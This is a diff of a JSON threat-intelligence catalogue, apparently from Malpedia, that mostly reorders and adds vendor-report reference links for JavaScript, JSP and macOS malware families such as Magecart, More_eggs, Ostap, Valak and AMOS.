"https://ti.qianxin.com/uploads/2020/02/13/cb78386a082f465f259b37dae5df4884.pdf", - "https://cert.ssi.gouv.fr/uploads/20220427_NP_TLPWHITE_ANSSI_FIN7.pdf", + "https://www.secureworks.com/research/threat-profiles/gold-niagara", "https://www.trustwave.com/en-us/resources/blogs/spiderlabs-blog/would-you-exchange-your-security-for-a-gift-card/", - "https://www.deepinstinct.com/blog/understanding-the-windows-javascript-threat-landscape", - "https://summit.fireeye.com/content/dam/fireeye-www/summit/cds-2018/presentations/cds18-technical-s05-att&cking-fin7.pdf", + "https://ti.qianxin.com/uploads/2020/02/13/cb78386a082f465f259b37dae5df4884.pdf", "https://www.microsoft.com/security/blog/2022/05/09/ransomware-as-a-service-understanding-the-cybercrime-gig-economy-and-how-to-protect-yourself/", "https://securelist.com/fin7-5-the-infamous-cybercrime-rig-fin7-continues-its-activities/90703/", - "https://twitter.com/ItsReallyNick/status/1059898708286939136", - "https://www.secureworks.com/research/threat-profiles/gold-niagara", + "https://cert.ssi.gouv.fr/uploads/20220427_NP_TLPWHITE_ANSSI_FIN7.pdf", "https://www.crowdstrike.com/blog/carbon-spider-sprite-spider-target-esxi-servers-with-ransomware/?utm_campaign=blog&utm_medium=soc&utm_source=twtr&utm_content=sprout", + "https://summit.fireeye.com/content/dam/fireeye-www/summit/cds-2018/presentations/cds18-technical-s05-att&cking-fin7.pdf", + "https://www.crowdstrike.com/blog/carbon-spider-embraces-big-game-hunting-part-2/", + "https://www.crowdstrike.com/blog/carbon-spider-embraces-big-game-hunting-part-1/", + "https://www.mandiant.com/resources/evolution-of-fin7", + "https://www.deepinstinct.com/blog/understanding-the-windows-javascript-threat-landscape", "https://www.microsoft.com/security/blog/2022/05/09/ransomware-as-a-service-understanding-the-cybercrime-gig-economy-and-how-to-protect-yourself", - "https://www.crowdstrike.com/blog/carbon-spider-embraces-big-game-hunting-part-2/" + "https://twitter.com/ItsReallyNick/status/1059898708286939136" ], "synonyms": [ "Harpy" @@ -8141,14 +8503,14 @@ "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/js.kopiluwak", - "https://ti.qianxin.com/uploads/2020/02/13/cb78386a082f465f259b37dae5df4884.pdf", - "https://www.proofpoint.com/us/threat-insight/post/turla-apt-actor-refreshes-kopiluwak-javascript-backdoor-use-g20-themed-attack", - "https://securelist.com/shedding-skin-turlas-fresh-faces/88069/", - "https://securelist.com/blog/research/77429/kopiluwak-a-new-javascript-payload-from-turla/", "https://pdfhost.io/v/F0@QElMu2_MacProStorage_2017FinalBitdefenderWhitepaperNetrepserA4en_ENBitdefenderWhitepaperNetrepserA4en_ENindd.pdf", + "https://ti.qianxin.com/uploads/2020/02/13/cb78386a082f465f259b37dae5df4884.pdf", "https://www.mandiant.com/resources/blog/turla-galaxy-opportunity", + "https://blog.angelalonso.es/2017/10/analysis-of-malicious-doc-used-by-turla.html", + "https://securelist.com/blog/research/77429/kopiluwak-a-new-javascript-payload-from-turla/", + "https://securelist.com/shedding-skin-turlas-fresh-faces/88069/", "https://securelist.com/tomiris-called-they-want-their-turla-malware-back/109552/", - "https://blog.angelalonso.es/2017/10/analysis-of-malicious-doc-used-by-turla.html" + "https://www.proofpoint.com/us/threat-insight/post/turla-apt-actor-refreshes-kopiluwak-javascript-backdoor-use-g20-themed-attack" ], "synonyms": [], "type": [] @@ -8161,10 +8523,10 @@ "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/js.lnkr", - "https://github.com/Zenexer/lnkr/blob/master/recon/extensions/fanagokoaogopceablgmpndejhedkjjb/README.md", - "https://www.riskiq.com/blog/labs/lnkr-browser-extension/", + "https://krebsonsecurity.com/2020/03/the-case-for-limiting-your-browser-extensions/", "https://github.com/Zenexer/lnkr", - "https://krebsonsecurity.com/2020/03/the-case-for-limiting-your-browser-extensions/" + "https://www.riskiq.com/blog/labs/lnkr-browser-extension/", + "https://github.com/Zenexer/lnkr/blob/master/recon/extensions/fanagokoaogopceablgmpndejhedkjjb/README.md" ], "synonyms": [], "type": [] @@ -8177,65 +8539,65 @@ "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/js.magecart", + "https://go.recordedfuture.com/hubfs/reports/cta-2022-0719.pdf", + "https://www.riskiq.com/blog/labs/magecart-ticketmaster-breach/", + "https://community.riskiq.com/article/2efc2782", + "https://www.riskiq.com/blog/labs/magecart-group-12-olympics/", + "https://blog.sucuri.net/2021/07/magecart-swiper-uses-unorthodox-concatenation.html", + "https://community.riskiq.com/article/5bea32aa", + "https://twitter.com/AffableKraut/status/1385030485676544001", + "https://www.riskiq.com/blog/labs/magecart-medialand/", "https://maxkersten.nl/2020/02/24/closing-in-on-magecart-12/", + "https://community.riskiq.com/article/fda1f967", + "https://sansec.io/research/magento-2-persistent-parasite", + "https://www.riskiq.com/blog/labs/misconfigured-s3-buckets/", + "https://www.riskiq.com/blog/labs/magecart-nutribullet/", + "https://sansec.io/research/magecart-corona-lockdown", "https://marcoramilli.com/2020/02/19/uncovering-new-magecart-implant-attacking-ecommerce/", "https://www.crowdstrike.com/blog/threat-actor-magecart-coming-to-an-ecommerce-store-near-you/", - "https://maxkersten.nl/2020/02/17/following-the-tracks-of-magecart-12/", - "https://scotthelme.co.uk/introducing-script-watch-detect-magecart-style-attacks-fast/?utm_source=dlvr.it&utm_medium=twitter", - "https://www.trustwave.com/en-us/resources/blogs/spiderlabs-blog/injecting-magecart-into-magento-global-config/", - "https://sansec.io/research/magecart-corona-lockdown", - "https://community.riskiq.com/article/30f22a00", - "https://blog.malwarebytes.com/threat-analysis/2020/06/web-skimmer-hides-within-exif-metadata-exfiltrates-credit-cards-via-image-files/", - "https://blog.malwarebytes.com/threat-analysis/2019/06/magecart-skimmers-found-on-amazon-cloudfront-cdn/", - "https://www.perimeterx.com/blog/analyzing_magecart_malware_from_zero_to_hero/", - "https://www.reflectiz.com/the-gocgle-web-skimming-campaign/", - "https://www.riskiq.com/blog/labs/magecart-group-4-always-advancing/", - "https://www.riskiq.com/blog/labs/misconfigured-s3-buckets/", + "https://www.zscaler.com/blogs/security-research/black-friday-scams-4-emerging-skimming-attacks-watch-holiday-season", + "https://medium.com/csis-techblog/inside-view-of-brazzzersff-infrastructure-89b9188fd145", + "https://blog.sucuri.net/2020/07/skimmers-in-images-github-repos.html", + "https://blog.malwarebytes.com/cybercrime/2019/04/github-hosted-magecart-skimmer-used-against-hundreds-of-e-commerce-sites/", + "https://blog.trendmicro.com/trendlabs-security-intelligence/magecart-skimming-attack-targets-mobile-users-of-hotel-chain-booking-websites/", + "https://sansec.io/labs/2020/01/25/magecart-hackers-arrested/", + "https://community.riskiq.com/article/017cf2e6", + "https://blog.malwarebytes.com/cybercrime/2021/05/newly-observed-php-based-skimmer-shows-ongoing-magecart-group-12-activity/", "https://blog.malwarebytes.com/cybercrime/2021/06/lil-skimmer-the-magecart-impersonator/", - "https://community.riskiq.com/article/743ea75b/description", + "https://blog.malwarebytes.com/threat-analysis/2020/06/web-skimmer-hides-within-exif-metadata-exfiltrates-credit-cards-via-image-files/", + "https://medium.com/reflectiz/csp-the-right-solution-for-the-web-skimming-pandemic-acb7a4414218", + "https://www.reflectiz.com/ico-fines-ticketmaster-uk-1-25-million-for-security-failures-a-lesson-to-be-learned/", + "https://blog.malwarebytes.com/threat-intelligence/2021/09/the-many-tentacles-of-magecart-group-8/", + "https://resources.malwarebytes.com/files/2020/02/2020_State-of-Malware-Report.pdf", + "https://maxkersten.nl/2020/02/17/following-the-tracks-of-magecart-12/", + "https://www.riskiq.com/blog/labs/magecart-group-4-always-advancing/", + "https://www.zdnet.com/article/web-skimmers-found-on-the-websites-of-intersport-claires-and-icing/", + "https://www.pwc.co.uk/cyber-security/assets/cyber-threats-2019-retrospect.pdf", + "https://blog.malwarebytes.com/threat-analysis/2019/06/magecart-skimmers-found-on-amazon-cloudfront-cdn/", + "https://blog.trendmicro.com/trendlabs-security-intelligence/us-local-government-services-targeted-by-new-magecart-credit-card-skimming-attack/", + "https://community.riskiq.com/article/30f22a00", + "https://maxkersten.nl/2020/01/20/ticket-resellers-infected-with-a-credit-card-skimmer/", + "https://blog.trendmicro.com/trendlabs-security-intelligence/mirrorthief-group-uses-magecart-skimming-attack-to-hit-hundreds-of-campus-online-stores-in-us-and-canada/", + "https://twitter.com/MBThreatIntel/status/1416101496022724609", + "https://blog.malwarebytes.com/threat-intelligence/2021/10/q-logger-skimmer-keeps-magecart-attacks-going/", + "https://twitter.com/AffableKraut/status/1415425132080816133?s=20", + "https://geminiadvisory.io/magecart-google-tag-manager/", + "https://securelist.com/apt-trends-report-q2-2019/91897/", + "https://www.goggleheadedhacker.com/blog/post/14", "https://blog.trendmicro.com/trendlabs-security-intelligence/fin6-compromised-e-commerce-platform-via-magecart-to-inject-credit-card-skimmers-into-thousands-of-online-shops/", "https://geminiadvisory.io/wp-content/uploads/2020/07/Appendix-C-1.pdf", - "https://geminiadvisory.io/keeper-magecart-group-infects-570-sites/", - "https://community.riskiq.com/article/2efc2782", - "https://go.recordedfuture.com/hubfs/reports/cta-2022-0719.pdf", - "https://resources.malwarebytes.com/files/2020/02/2020_State-of-Malware-Report.pdf", - "https://www.zdnet.com/article/web-skimmers-found-on-the-websites-of-intersport-claires-and-icing/", - "https://www.riskiq.com/blog/labs/magecart-ticketmaster-breach/", - "https://blog.sucuri.net/2020/11/css-js-steganography-in-fake-flash-player-update-malware.html", - "https://blog.malwarebytes.com/threat-intelligence/2021/09/the-many-tentacles-of-magecart-group-8/", - "https://blog.malwarebytes.com/threat-intelligence/2021/10/q-logger-skimmer-keeps-magecart-attacks-going/", - "https://twitter.com/MBThreatIntel/status/1416101496022724609", - "https://community.riskiq.com/article/017cf2e6", - "https://community.riskiq.com/article/5bea32aa", - "https://www.goggleheadedhacker.com/blog/post/14", - "https://www.reflectiz.com/ico-fines-ticketmaster-uk-1-25-million-for-security-failures-a-lesson-to-be-learned/", - "https://www.zscaler.com/blogs/security-research/black-friday-scams-4-emerging-skimming-attacks-watch-holiday-season", - "https://blog.trendmicro.com/trendlabs-security-intelligence/us-local-government-services-targeted-by-new-magecart-credit-card-skimming-attack/", - "https://www.riskiq.com/blog/labs/magecart-nutribullet/", - "https://www.riskiq.com/blog/labs/magecart-group-12-olympics/", - "https://twitter.com/AffableKraut/status/1385030485676544001", - "https://sansec.io/research/magento-2-persistent-parasite", - "https://blog.trendmicro.com/trendlabs-security-intelligence/mirrorthief-group-uses-magecart-skimming-attack-to-hit-hundreds-of-campus-online-stores-in-us-and-canada/", - "https://community.riskiq.com/article/14924d61", - "https://blog.sucuri.net/2021/07/magecart-swiper-uses-unorthodox-concatenation.html", - "https://medium.com/reflectiz/csp-the-right-solution-for-the-web-skimming-pandemic-acb7a4414218", - "https://sansec.io/labs/2020/01/25/magecart-hackers-arrested/", - "https://maxkersten.nl/2020/01/20/ticket-resellers-infected-with-a-credit-card-skimmer/", - "https://securelist.com/apt-trends-report-q2-2019/91897/", - "https://blog.sucuri.net/2020/07/skimmers-in-images-github-repos.html", - "https://community.riskiq.com/article/fda1f967", - "https://sansec.io/research/north-korea-magecart", - "https://www.pwc.co.uk/cyber-security/assets/cyber-threats-2019-retrospect.pdf", - "https://blog.malwarebytes.com/cybercrime/2019/04/github-hosted-magecart-skimmer-used-against-hundreds-of-e-commerce-sites/", - "https://blog.malwarebytes.com/threat-intelligence/2021/11/credit-card-skimmer-evades-virtual-machines/", + "https://scotthelme.co.uk/introducing-script-watch-detect-magecart-style-attacks-fast/?utm_source=dlvr.it&utm_medium=twitter", "https://blog.sucuri.net/2020/06/evasion-tactics-in-hybrid-credit-card-skimmers.html", - "https://geminiadvisory.io/magecart-google-tag-manager/", - "https://www.riskiq.com/blog/labs/magecart-medialand/", + "https://blog.malwarebytes.com/threat-intelligence/2021/11/credit-card-skimmer-evades-virtual-machines/", + "https://geminiadvisory.io/keeper-magecart-group-infects-570-sites/", + "https://community.riskiq.com/article/14924d61", + "https://www.trustwave.com/en-us/resources/blogs/spiderlabs-blog/injecting-magecart-into-magento-global-config/", "https://gallery.mailchimp.com/c35aef82661dad887b8162a4f/files/e24e8206-a157-4796-a8cb-2b7262cc76e8/CSIS_Threat_Matrix_H1_2019.pdf", - "https://medium.com/csis-techblog/inside-view-of-brazzzersff-infrastructure-89b9188fd145", - "https://blog.trendmicro.com/trendlabs-security-intelligence/magecart-skimming-attack-targets-mobile-users-of-hotel-chain-booking-websites/", - "https://blog.malwarebytes.com/cybercrime/2021/05/newly-observed-php-based-skimmer-shows-ongoing-magecart-group-12-activity/", - "https://twitter.com/AffableKraut/status/1415425132080816133?s=20" + "https://community.riskiq.com/article/743ea75b/description", + "https://www.reflectiz.com/the-gocgle-web-skimming-campaign/", + "https://blog.sucuri.net/2020/11/css-js-steganography-in-fake-flash-player-update-malware.html", + "https://www.perimeterx.com/blog/analyzing_magecart_malware_from_zero_to_hero/", + "https://sansec.io/research/north-korea-magecart" ], "synonyms": [], "type": [] @@ -8261,33 +8623,33 @@ "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/js.more_eggs", - "https://sec0wn.blogspot.com/2023/03/how-do-you-like-dem-eggs-i-like-mine.html?m=1", - "https://www.bitdefender.com/files/News/CaseStudies/study/262/Bitdefender-WhitePaper-An-APT-Blueprint-Gaining-New-Visibility-into-Financial-Threats-interactive.pdf", - "https://www.esentire.com/blog/hackers-spearphish-corporate-hiring-managers-with-poisoned-resumes-infecting-them-with-the-more-eggs-malware", - "https://www.secureworks.com/research/threat-profiles/gold-kingswood", - "http://www.secureworks.com/research/threat-profiles/gold-kingswood", - "https://www.esentire.com/web-native-pages/unmasking-venom-spider", - "https://blog.talosintelligence.com/2018/07/multiple-cobalt-personality-disorder.html", - "https://reaqta.com/2018/03/spear-phishing-campaign-leveraging-msxsl/", - "https://twitter.com/Arkbird_SOLG/status/1301536930069278727", - "https://mp.weixin.qq.com/s/REXBtbnI2zXj4H3u6ofMMw", - "https://attack.mitre.org/software/S0284/", - "https://www.proofpoint.com/us/threat-insight/post/fake-jobs-campaigns-delivering-moreeggs-backdoor-fake-job-offers", - "https://blog.trendmicro.com/trendlabs-security-intelligence/backdoor-carrying-emails-set-sights-on-russian-speaking-businesses/", - "https://asert.arbornetworks.com/double-the-infection-double-the-fun/", - "https://blog.trendmicro.com/trendlabs-security-intelligence/cobalt-spam-runs-use-macros-cve-2017-8759-exploit/", - "https://ti.qianxin.com/uploads/2020/02/13/cb78386a082f465f259b37dae5df4884.pdf", - "https://github.com/eset/malware-ioc/tree/master/evilnum", - "https://go.crowdstrike.com/rs/281-OBQ-266/images/Report2020CrowdStrikeGlobalThreatReport.pdf", - "https://securityintelligence.com/posts/itg08-aka-fin6-partners-with-trickbot-gang-uses-anchor-framework/", - "https://blog.morphisec.com/cobalt-gang-2.0", - "https://www.securonix.com/blog/threat-labs-security-advisory-new-ocxharvester-attack-campaign-leverages-modernized-more_eggs-suite/", - "https://securityintelligence.com/posts/more_eggs-anyone-threat-actor-itg08-strikes-again/", "https://expel.com/blog/more-eggs-and-some-linkedin-resume-spearphishing", + "https://go.crowdstrike.com/rs/281-OBQ-266/images/Report2020CrowdStrikeGlobalThreatReport.pdf", + "https://sec0wn.blogspot.com/2023/03/how-do-you-like-dem-eggs-i-like-mine.html?m=1", + "https://www.securonix.com/blog/threat-labs-security-advisory-new-ocxharvester-attack-campaign-leverages-modernized-more_eggs-suite/", + "https://www.secureworks.com/research/threat-profiles/gold-kingswood", "https://www.welivesecurity.com/2020/07/09/more-evil-deep-look-evilnum-toolset/", - "https://www.secureworks.com/blog/cybercriminals-increasingly-trying-to-ensnare-the-big-financial-fish", "https://www.esentire.com/security-advisories/hackers-spearphish-professionals-on-linkedin-with-fake-job-offers-infecting-them-with-malware-warns-esentire", - "https://quointelligence.eu/2020/07/golden-chickens-evolution-of-the-maas/" + "https://www.proofpoint.com/us/threat-insight/post/fake-jobs-campaigns-delivering-moreeggs-backdoor-fake-job-offers", + "https://blog.morphisec.com/cobalt-gang-2.0", + "https://www.esentire.com/web-native-pages/unmasking-venom-spider", + "https://quointelligence.eu/2020/07/golden-chickens-evolution-of-the-maas/", + "https://github.com/eset/malware-ioc/tree/master/evilnum", + "https://securityintelligence.com/posts/more_eggs-anyone-threat-actor-itg08-strikes-again/", + "https://blog.trendmicro.com/trendlabs-security-intelligence/cobalt-spam-runs-use-macros-cve-2017-8759-exploit/", + "https://asert.arbornetworks.com/double-the-infection-double-the-fun/", + "https://twitter.com/Arkbird_SOLG/status/1301536930069278727", + "http://www.secureworks.com/research/threat-profiles/gold-kingswood", + "https://securityintelligence.com/posts/itg08-aka-fin6-partners-with-trickbot-gang-uses-anchor-framework/", + "https://attack.mitre.org/software/S0284/", + "https://blog.trendmicro.com/trendlabs-security-intelligence/backdoor-carrying-emails-set-sights-on-russian-speaking-businesses/", + "https://mp.weixin.qq.com/s/REXBtbnI2zXj4H3u6ofMMw", + "https://blog.talosintelligence.com/2018/07/multiple-cobalt-personality-disorder.html", + "https://ti.qianxin.com/uploads/2020/02/13/cb78386a082f465f259b37dae5df4884.pdf", + "https://www.bitdefender.com/files/News/CaseStudies/study/262/Bitdefender-WhitePaper-An-APT-Blueprint-Gaining-New-Visibility-into-Financial-Threats-interactive.pdf", + "https://www.secureworks.com/blog/cybercriminals-increasingly-trying-to-ensnare-the-big-financial-fish", + "https://www.esentire.com/blog/hackers-spearphish-corporate-hiring-managers-with-poisoned-resumes-infecting-them-with-the-more-eggs-malware", + "https://reaqta.com/2018/03/spear-phishing-campaign-leveraging-msxsl/" ], "synonyms": [ "SKID", @@ -8303,10 +8665,10 @@ "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/js.nanhaishu", - "https://attack.mitre.org/software/S0228/", - "https://community.spiceworks.com/topic/1028936-stealthy-cyberespionage-campaign-attacks-with-social-engineering", "https://www.f-secure.com/documents/996508/1030745/nanhaishu_whitepaper.pdf", - "https://www.proofpoint.com/us/threat-insight/post/leviathan-espionage-actor-spearphishes-maritime-and-defense-targets" + "https://www.proofpoint.com/us/threat-insight/post/leviathan-espionage-actor-spearphishes-maritime-and-defense-targets", + "https://attack.mitre.org/software/S0228/", + "https://community.spiceworks.com/topic/1028936-stealthy-cyberespionage-campaign-attacks-with-social-engineering" ], "synonyms": [], "type": [] @@ -8319,9 +8681,9 @@ "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/js.node_rat", - "https://blogs.jpcert.or.jp/ja/2019/02/tick-activity.html", + "https://www.virusbulletin.com/virusbulletin/2020/05/vb2019-paper-apt-cases-exploiting-vulnerabilities-regionspecific-software/", "https://jsac.jpcert.or.jp/archive/2020/pdf/JSAC2020_0_JPCERT_en.pdf", - "https://www.virusbulletin.com/virusbulletin/2020/05/vb2019-paper-apt-cases-exploiting-vulnerabilities-regionspecific-software/" + "https://blogs.jpcert.or.jp/ja/2019/02/tick-activity.html" ], "synonyms": [], "type": [] @@ -8330,19 +8692,19 @@ "value": "NodeRAT" }, { - "description": "Ostap is a commodity JScript downloader first seen in campaigns in 2016. It has been observed being delivered in ACE archives and VBA macro-enabled Microsoft Office documents. Recent versions of Ostap query WMI to check for a blacklist of running processes:\r\n\r\nAgentSimulator.exe\r\nanti-virus.EXE\r\nBehaviorDumper\r\nBennyDB.exe\r\nctfmon.exe\r\nfakepos_bin\r\nFrzState2k\r\ngemu-ga.exe (Possible misspelling of Qemu hypervisor’s guest agent, qemu-ga.exe)\r\nImmunityDebugger.exe\r\nKMS Server Service.exe\r\nProcessHacker\r\nprocexp\r\nProxifier.exe\r\npython\r\ntcpdump\r\nVBoxService\r\nVBoxTray.exe\r\nVmRemoteGuest\r\nvmtoolsd\r\nVMware2B.exe\r\nVzService.exe\r\nwinace\r\nWireshark\r\n\r\nIf a blacklisted process is found, the malware terminates.\r\n\r\nOstap has been observed delivering other malware families, including Nymaim, Backswap and TrickBot.", + "description": "Ostap is a commodity JScript downloader first seen in campaigns in 2016. It has been observed being delivered in ACE archives and VBA macro-enabled Microsoft Office documents. Recent versions of Ostap query WMI to check for a blacklist of running processes:\r\n\r\nAgentSimulator.exe\r\nanti-virus.EXE\r\nBehaviorDumper\r\nBennyDB.exe\r\nctfmon.exe\r\nfakepos_bin\r\nFrzState2k\r\ngemu-ga.exe (Possible misspelling of Qemu hypervisor\u2019s guest agent, qemu-ga.exe)\r\nImmunityDebugger.exe\r\nKMS Server Service.exe\r\nProcessHacker\r\nprocexp\r\nProxifier.exe\r\npython\r\ntcpdump\r\nVBoxService\r\nVBoxTray.exe\r\nVmRemoteGuest\r\nvmtoolsd\r\nVMware2B.exe\r\nVzService.exe\r\nwinace\r\nWireshark\r\n\r\nIf a blacklisted process is found, the malware terminates.\r\n\r\nOstap has been observed delivering other malware families, including Nymaim, Backswap and TrickBot.", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/js.ostap", + "https://marcoramilli.com/2021/01/09/c2-traffic-patterns-personal-notes/", + "https://malfind.com/index.php/2021/11/24/from-the-archive-1-ostap-dropper-deobfuscation-and-analysis/", + "https://www.intrinsec.com/deobfuscating-hunting-ostap/", + "https://www.bromium.com/deobfuscating-ostap-trickbots-javascript-downloader/", "https://blog.trendmicro.com/trendlabs-security-intelligence/latest-trickbot-campaign-delivered-via-highly-obfuscated-js-file/", "https://www.cert.pl/en/news/single/ostap-malware-analysis-backswap-dropper/", - "https://github.com/cryptogramfan/Malware-Analysis-Scripts/blob/master/deobfuscate_ostap.py", "https://labs.bitdefender.com/2020/03/5-times-more-coronavirus-themed-malware-reports-during-march/?utm_campaign=twitter&utm_medium=twitter&utm_source=twitter", - "https://www.intrinsec.com/deobfuscating-hunting-ostap/", - "https://malfind.com/index.php/2021/11/24/from-the-archive-1-ostap-dropper-deobfuscation-and-analysis/", - "https://www.trendmicro.com/content/dam/trendmicro/global/en/research/21/i/ssl-tls-technical-brief/ssl-tls-technical-brief.pdf", - "https://www.bromium.com/deobfuscating-ostap-trickbots-javascript-downloader/", - "https://marcoramilli.com/2021/01/09/c2-traffic-patterns-personal-notes/" + "https://github.com/cryptogramfan/Malware-Analysis-Scripts/blob/master/deobfuscate_ostap.py", + "https://www.trendmicro.com/content/dam/trendmicro/global/en/research/21/i/ssl-tls-technical-brief/ssl-tls-technical-brief.pdf" ], "synonyms": [], "type": [] @@ -8368,9 +8730,9 @@ "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/js.peacenotwar", - "https://www.vice.com/en/article/dypeek/open-source-sabotage-node-ipc-wipe-russia-belraus-computers", "https://www.bleepingcomputer.com/news/security/big-sabotage-famous-npm-package-deletes-files-to-protest-ukraine-war/", - "https://gist.github.com/MidSpike/f7ae3457420af78a54b38a31cc0c809c" + "https://gist.github.com/MidSpike/f7ae3457420af78a54b38a31cc0c809c", + "https://www.vice.com/en/article/dypeek/open-source-sabotage-node-ipc-wipe-russia-belraus-computers" ], "synonyms": [], "type": [] @@ -8378,6 +8740,19 @@ "uuid": "6c304481-024e-4f34-af06-6235edacfdcc", "value": "PeaceNotWar" }, + { + "description": "", + "meta": { + "refs": [ + "https://malpedia.caad.fkie.fraunhofer.de/details/js.pindos", + "https://www.deepinstinct.com/blog/pindos-new-javascript-dropper-delivering-bumblebee-and-icedid" + ], + "synonyms": [], + "type": [] + }, + "uuid": "6af1eb7a-bc54-43af-9e15-7187a5f250c4", + "value": "PindOS" + }, { "description": "", "meta": { @@ -8396,8 +8771,8 @@ "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/js.qnodeservice", - "https://blog.trendmicro.com/trendlabs-security-intelligence/qnodeservice-node-js-trojan-spread-via-covid-19-lure/", - "https://www.telsy.com/wp-content/uploads/MAR_93433_WHITE.pdf" + "https://www.telsy.com/wp-content/uploads/MAR_93433_WHITE.pdf", + "https://blog.trendmicro.com/trendlabs-security-intelligence/qnodeservice-node-js-trojan-spread-via-covid-19-lure/" ], "synonyms": [], "type": [] @@ -8423,13 +8798,13 @@ "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/js.scanbox", - "https://www.trustwave.com/en-us/resources/blogs/spiderlabs-blog/attacker-tracking-users-seeking-pakistani-passport/", - "https://www.volexity.com/blog/2019/09/02/digital-crackdown-large-scale-surveillance-and-exploitation-of-uyghurs/", - "https://www.proofpoint.com/us/blog/threat-insight/chasing-currents-espionage-south-china-sea", - "https://www.alienvault.com/blogs/labs-research/scanbox-a-reconnaissance-framework-used-on-watering-hole-attacks", "https://www.proofpoint.com/us/blog/threat-insight/ta413-leverages-new-friarfox-browser-extension-target-gmail-accounts-global", "http://resources.infosecinstitute.com/scanbox-framework/", - "https://www.secureworks.com/research/threat-profiles/bronze-mohawk" + "https://www.alienvault.com/blogs/labs-research/scanbox-a-reconnaissance-framework-used-on-watering-hole-attacks", + "https://www.proofpoint.com/us/blog/threat-insight/chasing-currents-espionage-south-china-sea", + "https://www.secureworks.com/research/threat-profiles/bronze-mohawk", + "https://www.trustwave.com/en-us/resources/blogs/spiderlabs-blog/attacker-tracking-users-seeking-pakistani-passport/", + "https://www.volexity.com/blog/2019/09/02/digital-crackdown-large-scale-surveillance-and-exploitation-of-uyghurs/" ], "synonyms": [], "type": [] @@ -8442,9 +8817,9 @@ "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/js.sqlrat", - "https://ti.qianxin.com/uploads/2020/02/13/cb78386a082f465f259b37dae5df4884.pdf", + "https://cert.ssi.gouv.fr/uploads/20220427_NP_TLPWHITE_ANSSI_FIN7.pdf", "https://www.flashpoint-intel.com/blog/fin7-revisited-inside-astra-panel-and-sqlrat-malware/", - "https://cert.ssi.gouv.fr/uploads/20220427_NP_TLPWHITE_ANSSI_FIN7.pdf" + "https://ti.qianxin.com/uploads/2020/02/13/cb78386a082f465f259b37dae5df4884.pdf" ], "synonyms": [], "type": [] @@ -8483,9 +8858,9 @@ "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/js.turla_ff_ext", + "https://kindredsec.com/2019/08/12/an-overview-of-public-platform-c2s/", "https://kindredsec.wordpress.com/2019/08/12/an-overview-of-public-platform-c2s/", - "https://www.welivesecurity.com/2017/06/06/turlas-watering-hole-campaign-updated-firefox-extension-abusing-instagram/", - "https://kindredsec.com/2019/08/12/an-overview-of-public-platform-c2s/" + "https://www.welivesecurity.com/2017/06/06/turlas-watering-hole-campaign-updated-firefox-extension-abusing-instagram/" ], "synonyms": [], "type": [] @@ -8572,20 +8947,21 @@ "value": "Unidentified JS 002" }, { - "description": "", + "description": "According to PCrisk, Valak is malicious software that downloads JScript files and executes them. What happens next depends on the actions performed by the executed JScript files. It is very likely that cyber criminals behind Valak attempt to use this malware to cause chain infections (i.e., using Valak to distribute other malware).\r\n\r\nResearch shows that Valak is distributed through spam campaigns, however, in some cases, it infiltrates systems when they are already infected with malicious program such as Ursnif (also known as Gozi).", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/js.valak", + "https://cocomelonc.github.io/malware/2023/07/26/malware-tricks-35.html", + "https://medium.com/@prsecurity_/casual-analysis-of-valak-c2-3497fdb79bf7", + "https://labs.sentinelone.com/valak-malware-and-the-connection-to-gozi-loader-confcrew/", + "https://blog.talosintelligence.com/2020/07/valak-emerges.html", + "https://twitter.com/malware_traffic/status/1207824548021886977", + "https://security-soup.net/analysis-of-valak-maldoc/", + "https://threatresearch.ext.hp.com/detecting-ta551-domains/", "https://securityintelligence.com/posts/sodinokibi-ransomware-incident-response-intelligence-together/", "https://unit42.paloaltonetworks.com/atoms/monsterlibra/", - "https://threatresearch.ext.hp.com/detecting-ta551-domains/", - "https://medium.com/@prsecurity_/casual-analysis-of-valak-c2-3497fdb79bf7", "https://www.cybereason.com/blog/valak-more-than-meets-the-eye", - "https://unit42.paloaltonetworks.com/valak-evolution/", - "https://blog.talosintelligence.com/2020/07/valak-emerges.html", - "https://security-soup.net/analysis-of-valak-maldoc/", - "https://labs.sentinelone.com/valak-malware-and-the-connection-to-gozi-loader-confcrew/", - "https://twitter.com/malware_traffic/status/1207824548021886977" + "https://unit42.paloaltonetworks.com/valak-evolution/" ], "synonyms": [ "Valek" @@ -8613,10 +8989,10 @@ "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/jsp.godzilla_webshell", - "https://blog.gigamon.com/2022/09/28/investigating-web-shells/", - "https://unit42.paloaltonetworks.com/manageengine-godzilla-nglite-kdcsponge/", + "https://unit42.paloaltonetworks.com/tiltedtemple-manageengine-servicedesk-plus/", "https://www.microsoft.com/security/blog/2022/04/12/tarrask-malware-uses-scheduled-tasks-for-defense-evasion/", - "https://unit42.paloaltonetworks.com/tiltedtemple-manageengine-servicedesk-plus/" + "https://unit42.paloaltonetworks.com/manageengine-godzilla-nglite-kdcsponge/", + "https://blog.gigamon.com/2022/09/28/investigating-web-shells/" ], "synonyms": [], "type": [] @@ -8643,6 +9019,7 @@ "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/osx.amos", + "https://denshiyurei.medium.com/silent-echoes-the-hidden-dialogue-among-malware-entities-spotlight-on-amos-infostealer-6d7cd70e3219", "https://blog.cyble.com/2023/04/26/threat-actor-selling-new-atomic-macos-amos-stealer-on-telegram/" ], "synonyms": [ @@ -8658,28 +9035,30 @@ "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/osx.applejeus", - "https://www.youtube.com/watch?v=1NkzTKkEM2k", - "https://securelist.com/apt-trends-report-q2-2020/97937/", - "https://blog.sekoia.io/the-dprk-delicate-sound-of-cyber/", - "https://posts.specterops.io/introducing-venator-a-macos-tool-for-proactive-detection-34055a017e56", - 